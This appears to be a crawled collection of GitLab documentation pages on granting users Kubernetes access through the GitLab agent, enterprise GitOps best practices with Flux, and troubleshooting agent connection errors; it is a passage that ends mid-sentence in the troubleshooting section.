{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated - Status: Beta {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/390769) in GitLab 16.1, with [flags](../../../administration/feature_flags/_index.md) named `environment_settings_to_graphql`, `kas_user_access`, `kas_user_access_project`, and `expose_authorized_cluster_agents`. This feature is in [beta](../../../policy/development_stages_support.md#beta). - Feature flag `environment_settings_to_graphql` [removed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/124177) in GitLab 16.2. - Feature flags `kas_user_access`, `kas_user_access_project`, and `expose_authorized_cluster_agents` [removed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/125835) in GitLab 16.2. - The [limit of agent connection sharing was raised](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/149844) from 100 to 500 in GitLab 17.0 - The `user_access` parameter `access_as` [was made optional](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/merge_requests/2749) in GitLab 18.3. Defaults to agent impersonation. {{< /history >}} As an administrator of Kubernetes clusters in an organization, you can grant Kubernetes access to members of a specific project or group. Granting access also activates [the Dashboard for Kubernetes](../../../ci/environments/kubernetes_dashboard.md) for a project or group. For GitLab Self-Managed instances, make sure you either: - Host your GitLab instance and [KAS](../../../administration/clusters/kas.md) on the same domain. - Host KAS on a subdomain of GitLab. For example, GitLab on `gitlab.com` and KAS on `kas.gitlab.com`. ## Configure Kubernetes access Configure access when you want to grant users access to a Kubernetes cluster. Prerequisites: - The agent for Kubernetes is installed in the Kubernetes cluster. - You must have the Developer role or higher. To configure access: - In the agent configuration file, define a `user_access` keyword with the following parameters: - `projects`: A list of projects whose members should have access. You can authorize up to 500 projects. - `groups`: A list of groups whose members should have access. You can authorize up to 500 groups. It grants access to the group and all its descendants. - `access_as`: For access with agent identity, the value is `{ agent: {...} }`. After you configure access, requests are forwarded to the API server using the agent service account. For example: ```yaml # .gitlab/agents/my-agent/config.yaml user_access: access_as: agent: {} projects: - id: group-1/project-1 - id: group-2/project-2 groups: - id: group-2 - id: group-3/subgroup ``` ## Configure access with user impersonation {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can grant access to a Kubernetes cluster and transform requests into impersonation requests for authenticated users. Prerequisites: - The agent for Kubernetes is installed in the Kubernetes cluster. - You must have the Developer role or higher. To configure access with user impersonation: - In the agent configuration file, define a `user_access` keyword with the following parameters: - `projects`: A list of projects whose members should have access. - `groups`: A list of groups whose members should have access. - `access_as`: For user impersonation, the value is `{ user: {...} }`. After you configure access, requests are transformed into impersonation requests for authenticated users. ### User impersonation workflow The installed `agentk` impersonates the given users as follows: - `UserName` is `gitlab:user:<username>` - `Groups` is: - `gitlab:user`: Common to all requests coming from GitLab users. - `gitlab:project_role:<project_id>:<role>` for each role in each authorized project. - `gitlab:group_role:<group_id>:<role>` for each role in each authorized group. - `Extra` carries additional information about the request: - `agent.gitlab.com/id`: The agent ID. - `agent.gitlab.com/username`: The username of the GitLab user. - `agent.gitlab.com/config_project_id`: The agent configuration project ID. - `agent.gitlab.com/access_type`: One of `personal_access_token` or `session_cookie`. Ultimate only. Only projects and groups directly listed in the under `user_access` in the configuration file are impersonated. For example: ```yaml # .gitlab/agents/my-agent/config.yaml user_access: access_as: user: {} projects: - id: group-1/project-1 # group_id=1, project_id=1 - id: group-2/project-2 # group_id=2, project_id=2 groups: - id: group-2 # group_id=2 - id: group-3/subgroup # group_id=3, group_id=4 ``` In this configuration: - If a user is a member of only `group-1`, they receive only the Kubernetes RBAC groups `gitlab:project_role:1:<role>`. - If a user is a member of `group-2`, they receive both Kubernetes RBAC groups: - `gitlab:project_role:2:<role>`, - `gitlab:group_role:2:<role>`. ### RBAC authorization Impersonated requests require `ClusterRoleBinding` or `RoleBinding` to identify the resource permissions inside Kubernetes. See [RBAC authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) for the appropriate configuration. For example, if you allow maintainers in `awesome-org/deployment` project (ID: 123) to read the Kubernetes workloads, you must add a `ClusterRoleBinding` resource to your Kubernetes configuration: ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: my-cluster-role-binding roleRef: name: view kind: ClusterRole apiGroup: rbac.authorization.k8s.io subjects: - name: gitlab:project_role:123:maintainer kind: Group ``` ## Access a cluster with the Kubernetes API {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/131144) in GitLab 16.4. {{< /history >}} You can configure an agent to allow GitLab users to access a cluster with the Kubernetes API. Prerequisites: - You have an agent configured with the `user_access` entry. ### Configure local access with the GitLab CLI (recommended) You can use the [GitLab CLI `glab`](../../../editor_extensions/gitlab_cli/_index.md) to create or update a Kubernetes configuration file to access the agent Kubernetes API. Use `glab cluster agent` commands to manage cluster connections: 1. View a list of all the agents associated with your project: ```shell glab cluster agent list --repo '<group>/<project>' # If your current working directory is the Git repository of the project with the agent, you can omit the --repo option: glab cluster agent list ``` 1. Use the numerical agent ID presented in the first column of the output to update your `kubeconfig`: ```shell glab cluster agent update-kubeconfig --repo '<group>/<project>' --agent '<agent-id>' --use-context ``` 1. Verify the update with `kubectl` or your preferred Kubernetes tooling: ```shell kubectl get nodes ``` The `update-kubeconfig` command sets `glab cluster agent get-token` as a [credential plugin](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#client-go-credential-plugins) for Kubernetes tools to retrieve a token. The `get-token` command creates and returns a personal access token that is valid until the end of the current day. Kubernetes tools cache the token until it expires, the API returns an authorization error, or the process exits. Expect all subsequent calls to your Kubernetes tooling to create a new token. The `glab cluster agent update-kubeconfig` command supports a number of command line flags. You can view all supported flags with `glab cluster agent update-kubeconfig --help`. Some examples: ```shell # When the current working directory is the Git repository where the agent is registered the --repo / -R flag can be omitted glab cluster agent update-kubeconfig --agent '<agent-id>' # When the --use-context option is specified the `current-context` of the kubeconfig file is changed to the agent context glab cluster agent update-kubeconfig --agent '<agent-id>' --use-context # The --kubeconfig flag can be used to specify an alternative kubeconfig path glab cluster agent update-kubeconfig --agent '<agent-id>' --kubeconfig ~/gitlab.kubeconfig ``` ### Configure local access manually using a personal access token You can configure access to a Kubernetes cluster using a long-lived personal access token: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Operate > Kubernetes clusters** and retrieve the numerical ID of the agent you want to access. You need the ID to construct the full API token. 1. Create a [personal access token](../../profile/personal_access_tokens.md) with the `k8s_proxy` scope. You need the access token to construct the full API token. 1. Construct `kubeconfig` entries to access the cluster: 1. Make sure that the proper `kubeconfig` is selected. For example, you can set the `KUBECONFIG` environment variable. 1. Add the GitLab KAS proxy cluster to the `kubeconfig`: ```shell kubectl config set-cluster <cluster_name> --server "https://kas.gitlab.com/k8s-proxy" ``` The `server` argument points to the KAS address of your GitLab instance. On GitLab.com, this is `https://kas.gitlab.com/k8s-proxy`. You can get the KAS address of your instance when you register an agent. 1. Use your numerical agent ID and personal access token to construct an API token: ```shell kubectl config set-credentials <gitlab_user> --token "pat:<agent-id>:<token>" ``` 1. Add the context to combine the cluster and the user: ```shell kubectl config set-context <gitlab_agent> --cluster <cluster_name> --user <gitlab_user> ``` 1. Activate the new context: ```shell kubectl config use-context <gitlab_agent> ``` 1. Check that the configuration works: ```shell kubectl get nodes ``` The configured user can access your cluster with the Kubernetes API. ## Related topics - [Architectural blueprint](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/kubernetes_user_access.md) - [Dashboard for Kubernetes](https://gitlab.com/groups/gitlab-org/-/epics/2493)
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Grant users Kubernetes access breadcrumbs: - doc - user - clusters - agent --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated - Status: Beta {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/390769) in GitLab 16.1, with [flags](../../../administration/feature_flags/_index.md) named `environment_settings_to_graphql`, `kas_user_access`, `kas_user_access_project`, and `expose_authorized_cluster_agents`. This feature is in [beta](../../../policy/development_stages_support.md#beta). - Feature flag `environment_settings_to_graphql` [removed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/124177) in GitLab 16.2. - Feature flags `kas_user_access`, `kas_user_access_project`, and `expose_authorized_cluster_agents` [removed](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/125835) in GitLab 16.2. - The [limit of agent connection sharing was raised](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/149844) from 100 to 500 in GitLab 17.0 - The `user_access` parameter `access_as` [was made optional](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/merge_requests/2749) in GitLab 18.3. Defaults to agent impersonation. {{< /history >}} As an administrator of Kubernetes clusters in an organization, you can grant Kubernetes access to members of a specific project or group. Granting access also activates [the Dashboard for Kubernetes](../../../ci/environments/kubernetes_dashboard.md) for a project or group. For GitLab Self-Managed instances, make sure you either: - Host your GitLab instance and [KAS](../../../administration/clusters/kas.md) on the same domain. - Host KAS on a subdomain of GitLab. For example, GitLab on `gitlab.com` and KAS on `kas.gitlab.com`. ## Configure Kubernetes access Configure access when you want to grant users access to a Kubernetes cluster. Prerequisites: - The agent for Kubernetes is installed in the Kubernetes cluster. - You must have the Developer role or higher. To configure access: - In the agent configuration file, define a `user_access` keyword with the following parameters: - `projects`: A list of projects whose members should have access. You can authorize up to 500 projects. - `groups`: A list of groups whose members should have access. You can authorize up to 500 groups. It grants access to the group and all its descendants. - `access_as`: For access with agent identity, the value is `{ agent: {...} }`. After you configure access, requests are forwarded to the API server using the agent service account. For example: ```yaml # .gitlab/agents/my-agent/config.yaml user_access: access_as: agent: {} projects: - id: group-1/project-1 - id: group-2/project-2 groups: - id: group-2 - id: group-3/subgroup ``` ## Configure access with user impersonation {{< details >}} - Tier: Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can grant access to a Kubernetes cluster and transform requests into impersonation requests for authenticated users. Prerequisites: - The agent for Kubernetes is installed in the Kubernetes cluster. - You must have the Developer role or higher. To configure access with user impersonation: - In the agent configuration file, define a `user_access` keyword with the following parameters: - `projects`: A list of projects whose members should have access. - `groups`: A list of groups whose members should have access. - `access_as`: For user impersonation, the value is `{ user: {...} }`. After you configure access, requests are transformed into impersonation requests for authenticated users. ### User impersonation workflow The installed `agentk` impersonates the given users as follows: - `UserName` is `gitlab:user:<username>` - `Groups` is: - `gitlab:user`: Common to all requests coming from GitLab users. - `gitlab:project_role:<project_id>:<role>` for each role in each authorized project. - `gitlab:group_role:<group_id>:<role>` for each role in each authorized group. - `Extra` carries additional information about the request: - `agent.gitlab.com/id`: The agent ID. - `agent.gitlab.com/username`: The username of the GitLab user. - `agent.gitlab.com/config_project_id`: The agent configuration project ID. - `agent.gitlab.com/access_type`: One of `personal_access_token` or `session_cookie`. Ultimate only. Only projects and groups directly listed in the under `user_access` in the configuration file are impersonated. For example: ```yaml # .gitlab/agents/my-agent/config.yaml user_access: access_as: user: {} projects: - id: group-1/project-1 # group_id=1, project_id=1 - id: group-2/project-2 # group_id=2, project_id=2 groups: - id: group-2 # group_id=2 - id: group-3/subgroup # group_id=3, group_id=4 ``` In this configuration: - If a user is a member of only `group-1`, they receive only the Kubernetes RBAC groups `gitlab:project_role:1:<role>`. - If a user is a member of `group-2`, they receive both Kubernetes RBAC groups: - `gitlab:project_role:2:<role>`, - `gitlab:group_role:2:<role>`. ### RBAC authorization Impersonated requests require `ClusterRoleBinding` or `RoleBinding` to identify the resource permissions inside Kubernetes. See [RBAC authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/) for the appropriate configuration. For example, if you allow maintainers in `awesome-org/deployment` project (ID: 123) to read the Kubernetes workloads, you must add a `ClusterRoleBinding` resource to your Kubernetes configuration: ```yaml apiVersion: rbac.authorization.k8s.io/v1 kind: ClusterRoleBinding metadata: name: my-cluster-role-binding roleRef: name: view kind: ClusterRole apiGroup: rbac.authorization.k8s.io subjects: - name: gitlab:project_role:123:maintainer kind: Group ``` ## Access a cluster with the Kubernetes API {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/131144) in GitLab 16.4. {{< /history >}} You can configure an agent to allow GitLab users to access a cluster with the Kubernetes API. Prerequisites: - You have an agent configured with the `user_access` entry. ### Configure local access with the GitLab CLI (recommended) You can use the [GitLab CLI `glab`](../../../editor_extensions/gitlab_cli/_index.md) to create or update a Kubernetes configuration file to access the agent Kubernetes API. Use `glab cluster agent` commands to manage cluster connections: 1. View a list of all the agents associated with your project: ```shell glab cluster agent list --repo '<group>/<project>' # If your current working directory is the Git repository of the project with the agent, you can omit the --repo option: glab cluster agent list ``` 1. Use the numerical agent ID presented in the first column of the output to update your `kubeconfig`: ```shell glab cluster agent update-kubeconfig --repo '<group>/<project>' --agent '<agent-id>' --use-context ``` 1. Verify the update with `kubectl` or your preferred Kubernetes tooling: ```shell kubectl get nodes ``` The `update-kubeconfig` command sets `glab cluster agent get-token` as a [credential plugin](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#client-go-credential-plugins) for Kubernetes tools to retrieve a token. The `get-token` command creates and returns a personal access token that is valid until the end of the current day. Kubernetes tools cache the token until it expires, the API returns an authorization error, or the process exits. Expect all subsequent calls to your Kubernetes tooling to create a new token. The `glab cluster agent update-kubeconfig` command supports a number of command line flags. You can view all supported flags with `glab cluster agent update-kubeconfig --help`. Some examples: ```shell # When the current working directory is the Git repository where the agent is registered the --repo / -R flag can be omitted glab cluster agent update-kubeconfig --agent '<agent-id>' # When the --use-context option is specified the `current-context` of the kubeconfig file is changed to the agent context glab cluster agent update-kubeconfig --agent '<agent-id>' --use-context # The --kubeconfig flag can be used to specify an alternative kubeconfig path glab cluster agent update-kubeconfig --agent '<agent-id>' --kubeconfig ~/gitlab.kubeconfig ``` ### Configure local access manually using a personal access token You can configure access to a Kubernetes cluster using a long-lived personal access token: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Operate > Kubernetes clusters** and retrieve the numerical ID of the agent you want to access. You need the ID to construct the full API token. 1. Create a [personal access token](../../profile/personal_access_tokens.md) with the `k8s_proxy` scope. You need the access token to construct the full API token. 1. Construct `kubeconfig` entries to access the cluster: 1. Make sure that the proper `kubeconfig` is selected. For example, you can set the `KUBECONFIG` environment variable. 1. Add the GitLab KAS proxy cluster to the `kubeconfig`: ```shell kubectl config set-cluster <cluster_name> --server "https://kas.gitlab.com/k8s-proxy" ``` The `server` argument points to the KAS address of your GitLab instance. On GitLab.com, this is `https://kas.gitlab.com/k8s-proxy`. You can get the KAS address of your instance when you register an agent. 1. Use your numerical agent ID and personal access token to construct an API token: ```shell kubectl config set-credentials <gitlab_user> --token "pat:<agent-id>:<token>" ``` 1. Add the context to combine the cluster and the user: ```shell kubectl config set-context <gitlab_agent> --cluster <cluster_name> --user <gitlab_user> ``` 1. Activate the new context: ```shell kubectl config use-context <gitlab_agent> ``` 1. Check that the configuration works: ```shell kubectl get nodes ``` The configured user can access your cluster with the Kubernetes API. ## Related topics - [Architectural blueprint](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/kubernetes_user_access.md) - [Dashboard for Kubernetes](https://gitlab.com/groups/gitlab-org/-/epics/2493)
https://docs.gitlab.com/user/clusters/enterprise_considerations
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/enterprise_considerations.md
2025-08-13
doc/user/clusters/agent
[ "doc", "user", "clusters", "agent" ]
enterprise_considerations.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Best practices for using the GitLab integration with Kubernetes
null
The agent for Kubernetes and Flux together offer the best experience when deploying to Kubernetes through GitOps. GitLab recommends using GitOps (also known as pull-based deployment) for deployments. However, your company might not be able to transition to GitOps, or you might have certain (typically non-production) reasons to use a pipeline-based approach. This page describes best practices for using GitOps for enterprise, with some considerations for pipeline-based deployments. For a description of the advantages of GitOps, see [the OpenGitOps initiative](https://opengitops.dev/about). ## GitOps - Although [Get started connecting a Kubernetes cluster to GitLab](getting_started.md) shows how to install Flux using the Flux CLI, to scale and automate Flux deployments you should do either of the following: - Use the [Flux Operator](https://github.com/controlplaneio-fluxcd/flux-operator). - Install with [Terraform](https://registry.terraform.io/providers/fluxcd/flux/latest/docs) or [OpenTofu](https://search.opentofu.org/provider/fluxcd/flux/latest). - Configure Flux with [multi-tenancy lockdown](https://fluxcd.io/flux/installation/configuration/multitenancy/). - For scaling, Flux supports [vertical](https://fluxcd.io/flux/installation/configuration/vertical-scaling/) and [horizontal sharding](https://fluxcd.io/flux/installation/configuration/sharding/). - For Flux-specific guidance, see the [Flux guides](https://fluxcd.io/flux/guides/) in the Flux documentation. - To simplify maintenance, you should run a single GitLab agent for Kubernetes installation per cluster. You can share the agent connection with impersonation features across the GitLab domain. - Consider using the Flux `OCIRepository` for storing and retrieving manifests. You can use GitLab pipelines to build and push the OCI images to the container registry. - To shorten the feedback loop, trigger an immediate GitOps reconciliation from the related GitLab pipeline. - You should sign generated OCI images, and deploy only images signed and verified by Flux. - Be sure to regularly rotate the keys used by Flux to access the manifests. You should also regularly rotate your agent-registration token. ### OCI containers When you use OCI containers instead of Git repositories, the source of truth for the manifests is still the Git repository. You can think of the OCI container as a caching layer between the Git repository and the cluster. There are several benefits to using OCI containers: - OCI was designed for scalability. Although the GitLab Git repositories scale well, they were not designed for this use case. - A single Git repository can be the source of several OCI containers, each packaging a small set of manifests. This way, if you need to retrieve a set of manifests, you don't need to download the whole Git repository. - OCI repositories can follow a well-known versioning scheme, and Flux can be configured to auto-update following that scheme. For example, if you use semantic versioning, Flux can deploy all the minor and patch changes automatically, while major versions require a manual update. - OCI images can be signed, and the signature can be verified by Flux. - OCI repositories can be scanned by the container registry, even after the image is built. - The job that builds the OCI container enables using well-known release management features that regular GitOps tools doesn't support, like [protected environments](../../../ci/environments/protected_environments.md), [deployment approvals](../../../ci/environments/deployment_approvals.md), and [deployment freeze windows](../../project/releases/_index.md#prevent-unintentional-releases-by-setting-a-deploy-freeze). ## Pipeline-based deployments If you need to use a pipeline-based deployment, follow these best practices: - To reduce the number of agent deployed per cluster, share the agent connection across your groups and projects. If possible, use only one agent deployment per cluster. - Use impersonation, and minimize the access CI/CD jobs in the cluster using regular Kubernetes RBAC.
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Best practices for using the GitLab integration with Kubernetes breadcrumbs: - doc - user - clusters - agent --- The agent for Kubernetes and Flux together offer the best experience when deploying to Kubernetes through GitOps. GitLab recommends using GitOps (also known as pull-based deployment) for deployments. However, your company might not be able to transition to GitOps, or you might have certain (typically non-production) reasons to use a pipeline-based approach. This page describes best practices for using GitOps for enterprise, with some considerations for pipeline-based deployments. For a description of the advantages of GitOps, see [the OpenGitOps initiative](https://opengitops.dev/about). ## GitOps - Although [Get started connecting a Kubernetes cluster to GitLab](getting_started.md) shows how to install Flux using the Flux CLI, to scale and automate Flux deployments you should do either of the following: - Use the [Flux Operator](https://github.com/controlplaneio-fluxcd/flux-operator). - Install with [Terraform](https://registry.terraform.io/providers/fluxcd/flux/latest/docs) or [OpenTofu](https://search.opentofu.org/provider/fluxcd/flux/latest). - Configure Flux with [multi-tenancy lockdown](https://fluxcd.io/flux/installation/configuration/multitenancy/). - For scaling, Flux supports [vertical](https://fluxcd.io/flux/installation/configuration/vertical-scaling/) and [horizontal sharding](https://fluxcd.io/flux/installation/configuration/sharding/). - For Flux-specific guidance, see the [Flux guides](https://fluxcd.io/flux/guides/) in the Flux documentation. - To simplify maintenance, you should run a single GitLab agent for Kubernetes installation per cluster. You can share the agent connection with impersonation features across the GitLab domain. - Consider using the Flux `OCIRepository` for storing and retrieving manifests. You can use GitLab pipelines to build and push the OCI images to the container registry. - To shorten the feedback loop, trigger an immediate GitOps reconciliation from the related GitLab pipeline. - You should sign generated OCI images, and deploy only images signed and verified by Flux. - Be sure to regularly rotate the keys used by Flux to access the manifests. You should also regularly rotate your agent-registration token. ### OCI containers When you use OCI containers instead of Git repositories, the source of truth for the manifests is still the Git repository. You can think of the OCI container as a caching layer between the Git repository and the cluster. There are several benefits to using OCI containers: - OCI was designed for scalability. Although the GitLab Git repositories scale well, they were not designed for this use case. - A single Git repository can be the source of several OCI containers, each packaging a small set of manifests. This way, if you need to retrieve a set of manifests, you don't need to download the whole Git repository. - OCI repositories can follow a well-known versioning scheme, and Flux can be configured to auto-update following that scheme. For example, if you use semantic versioning, Flux can deploy all the minor and patch changes automatically, while major versions require a manual update. - OCI images can be signed, and the signature can be verified by Flux. - OCI repositories can be scanned by the container registry, even after the image is built. - The job that builds the OCI container enables using well-known release management features that regular GitOps tools doesn't support, like [protected environments](../../../ci/environments/protected_environments.md), [deployment approvals](../../../ci/environments/deployment_approvals.md), and [deployment freeze windows](../../project/releases/_index.md#prevent-unintentional-releases-by-setting-a-deploy-freeze). ## Pipeline-based deployments If you need to use a pipeline-based deployment, follow these best practices: - To reduce the number of agent deployed per cluster, share the agent connection across your groups and projects. If possible, use only one agent deployment per cluster. - Use impersonation, and minimize the access CI/CD jobs in the cluster using regular Kubernetes RBAC.
https://docs.gitlab.com/user/clusters/troubleshooting
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/troubleshooting.md
2025-08-13
doc/user/clusters/agent
[ "doc", "user", "clusters", "agent" ]
troubleshooting.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Troubleshooting the GitLab agent for Kubernetes
null
When you are using the GitLab agent for Kubernetes, you might experience issues you need to troubleshoot. You can start by viewing the service logs: ```shell kubectl logs -f -l=app.kubernetes.io/name=gitlab-agent -n gitlab-agent ``` If you are a GitLab administrator, you can also view the [GitLab agent server for Kubernetes logs](../../../administration/clusters/kas.md#troubleshooting). ## Transport: Error while dialing failed to WebSocket dial ```json { "level": "warn", "time": "2020-11-04T10:14:39.368Z", "msg": "GetConfiguration failed", "error": "rpc error: code = Unavailable desc = connection error: desc = \"transport: Error while dialing failed to WebSocket dial: failed to send handshake request: Get \\\"https://gitlab-kas:443/-/kubernetes-agent\\\": dial tcp: lookup gitlab-kas on 10.60.0.10:53: no such host\"" } ``` This error occurs when there are connectivity issues between the `kas-address` and your agent pod. To fix this issue, make sure the `kas-address` is accurate. ```json { "level": "error", "time": "2021-06-25T21:15:45.335Z", "msg": "Reverse tunnel", "mod_name": "reverse_tunnel", "error": "Connect(): rpc error: code = Unavailable desc = connection error: desc= \"transport: Error while dialing failed to WebSocket dial: expected handshake response status code 101 but got 301\"" } ``` This error occurs when the `kas-address` doesn't include a trailing slash. To fix this issue, make sure that the `wss` or `ws` URL ends with a trailing slash, like `wss://GitLab.host.tld:443/-/kubernetes-agent/` or `ws://GitLab.host.tld:80/-/kubernetes-agent/`. ## Error while dialing failed to WebSocket dial: failed to send handshake request ```json { "level": "warn", "time": "2020-10-30T09:50:51.173Z", "msg": "GetConfiguration failed", "error": "rpc error: code = Unavailable desc = connection error: desc = \"transport: Error while dialing failed to WebSocket dial: failed to send handshake request: Get \\\"https://GitLabhost.tld:443/-/kubernetes-agent\\\": net/http: HTTP/1.x transport connection broken: malformed HTTP response \\\"\\\\x00\\\\x00\\\\x06\\\\x04\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x05\\\\x00\\\\x00@\\\\x00\\\"\"" } ``` This error occurs when you configured `wss` as `kas-address` on the agent side, but the agent server is not available at `wss`. To fix this issue, make sure the same schemes are configured on both sides. ## Decompressor is not installed for grpc-encoding ```json { "level": "warn", "time": "2020-11-05T05:25:46.916Z", "msg": "GetConfiguration.Recv failed", "error": "rpc error: code = Unimplemented desc = grpc: Decompressor is not installed for grpc-encoding \"gzip\"" } ``` This error occurs when the version of the agent is newer that the version of the agent server (KAS). To fix it, make sure that both `agentk` and the agent server are the same version. ## Certificate signed by unknown authority ```json { "level": "error", "time": "2021-02-25T07:22:37.158Z", "msg": "Reverse tunnel", "mod_name": "reverse_tunnel", "error": "Connect(): rpc error: code = Unavailable desc = connection error: desc = \"transport: Error while dialing failed to WebSocket dial: failed to send handshake request: Get \\\"https://GitLabhost.tld:443/-/kubernetes-agent/\\\": x509: certificate signed by unknown authority\"" } ``` This error occurs when your GitLab instance is using a certificate signed by an internal certificate authority that is unknown to the agent. To fix this issue, you can present the CA certificate file to the agent by [customizing the Helm installation](install/_index.md#customize-the-helm-installation). Add `--set-file config.kasCaCert=my-custom-ca.pem` to the `helm install` command. The file should be a valid PEM or DER-encoded certificate. When you deploy `agentk` with a set `config.kasCaCert` value, the certificate is added to `configmap` and the certificate file is mounted in `/etc/ssl/certs`. For example, with the command `kubectl get configmap -lapp=gitlab-agent -o yaml`: ```yaml apiVersion: v1 items: - apiVersion: v1 data: ca.crt: |- -----BEGIN CERTIFICATE----- MIIFmzCCA4OgAwIBAgIUE+FvXfDpJ869UgJitjRX7HHT84cwDQYJKoZIhvcNAQEL ...truncated certificate... GHZCTQkbQyUwBWJOUyOxW1lro4hWqtP4xLj8Dpq1jfopH72h0qTGkX0XhFGiSaM= -----END CERTIFICATE----- kind: ConfigMap metadata: annotations: meta.helm.sh/release-name: self-signed meta.helm.sh/release-namespace: gitlab-agent-self-signed creationTimestamp: "2023-03-07T20:12:26Z" labels: app: gitlab-agent app.kubernetes.io/managed-by: Helm app.kubernetes.io/name: gitlab-agent app.kubernetes.io/version: v15.9.0 helm.sh/chart: gitlab-agent-1.11.0 name: self-signed-gitlab-agent resourceVersion: "263184207" kind: List ``` You might see a similar error in the [agent server (KAS) logs](../../../administration/logs/_index.md#gitlab-agent-server-for-kubernetes) of your GitLab application server: ```json {"level":"error","time":"2023-03-07T20:19:48.151Z","msg":"AgentInfo()","grpc_service":"gitlab.agent.agent_configuration.rpc.AgentConfiguration","grpc_method":"GetConfiguration","error":"Get \"https://gitlab.example.com/api/v4/internal/kubernetes/agent_info\": x509: certificate signed by unknown authority"} ``` To fix it, [install the public certificate of your internal CA](https://docs.gitlab.com/omnibus/settings/ssl/#install-custom-public-certificates) in the `/etc/gitlab/trusted-certs` directory. Alternatively, you can configure the agent server (KAS) to read the certificate from a custom directory. Add the following configuration to `/etc/gitlab/gitlab.rb`: ```ruby gitlab_kas['env'] = { 'SSL_CERT_DIR' => "/opt/gitlab/embedded/ssl/certs/" } ``` To apply the changes: 1. Reconfigure GitLab. ```shell sudo gitlab-ctl reconfigure ``` 1. Restart `gitlab-kas`. ```shell gitlab-ctl restart gitlab-kas ``` ## Error: `Failed to register agent pod` The agent pod logs might display the error message `Failed to register agent pod. Please make sure the agent version matches the server version`. To resolve this issue, ensure that the agent version matches the GitLab version. If the versions match and the error persists: 1. Make sure `gitlab-kas` is running with `gitlab-ctl status gitlab-kas`. 1. Check the `gitlab-kas` [logs](../../../administration/logs/_index.md#gitlab-agent-server-for-kubernetes) to make sure the agent is functioning properly. ## Failed to perform vulnerability scan on workload: jobs.batch already exists ```json { "level": "error", "time": "2022-06-22T21:03:04.769Z", "msg": "Failed to perform vulnerability scan on workload", "mod_name": "starboard_vulnerability", "error": "running scan job: creating job: jobs.batch \"scan-vulnerabilityreport-b8d497769\" already exists" } ``` The GitLab agent for Kubernetes performs vulnerability scans by creating a job to scan each workload. If a scan is interrupted, these jobs may be left behind and need to be cleaned up before more jobs can be run. You can clean up these jobs by running: ```shell kubectl delete jobs -l app.kubernetes.io/managed-by=starboard -n gitlab-agent ``` [We're working on making the cleanup of these jobs more robust.](https://gitlab.com/gitlab-org/gitlab/-/issues/362016) ## Parse error during installation When you install the agent, you might encounter an error that states: ```shell Error: parse error at (gitlab-agent/templates/observability-secret.yaml:1): unclosed action ``` This error is typically caused by an incompatible version of Helm. To resolve the issue, ensure that you are using a version of Helm [compatible with your version of Kubernetes](_index.md#supported-kubernetes-versions-for-gitlab-features). ## `GitLab Agent Server: Unauthorized` error on Dashboard for Kubernetes An error like `GitLab Agent Server: Unauthorized. Trace ID: <...>` on the [Dashboard for Kubernetes](../../../ci/environments/kubernetes_dashboard.md) page might be caused by one of the following: - The `user_access` entry in the agent configuration file doesn't exist or is wrong. To resolve, see [Grant users Kubernetes access](user_access.md). - There are multiple [`_gitlab_kas` cookies](../../../administration/clusters/kas.md#kubernetes-api-proxy-cookie) in the browser and sent to KAS. The most likely cause is multiple GitLab instances hosted on the same site. For example, `gitlab.com` set a `_gitlab_kas` cookie targeted for `kas.gitlab.com`, but the cookie is also sent to `kas.staging.gitlab.com`, which causes the error on `staging.gitlab.com`. To temporarily resolve, delete the `_gitlab_kas` cookie for `gitlab.com` from the browser cookie store. [Issue 418998](https://gitlab.com/gitlab-org/gitlab/-/issues/418998) proposes a fix for this known issue. - GitLab and KAS run on different sites. For example, GitLab on `gitlab.example.com` and KAS on `kas.example.com`. GitLab does not support this use case. For details, see [issue 416436](https://gitlab.com/gitlab-org/gitlab/-/issues/416436). ## Agent version mismatch In GitLab, on the **Agent** tab of the Kubernetes clusters page, you might see a warning that says `Agent version mismatch: The agent versions do not match each other across your cluster's pods.` This warning might be caused by an older version of the agent being cached by the agent server for Kubernetes (`kas`). Because `kas` periodically deletes outdated agent versions, you should wait at least 20 minutes for the agent and GitLab to reconcile. If the warning persists, update the agent installed on your cluster. ## Kubernetes API proxy response headers are lost or blocked HTTP response headers might get blocked when sent from the Kubernetes cluster to the user through the Kubernetes API 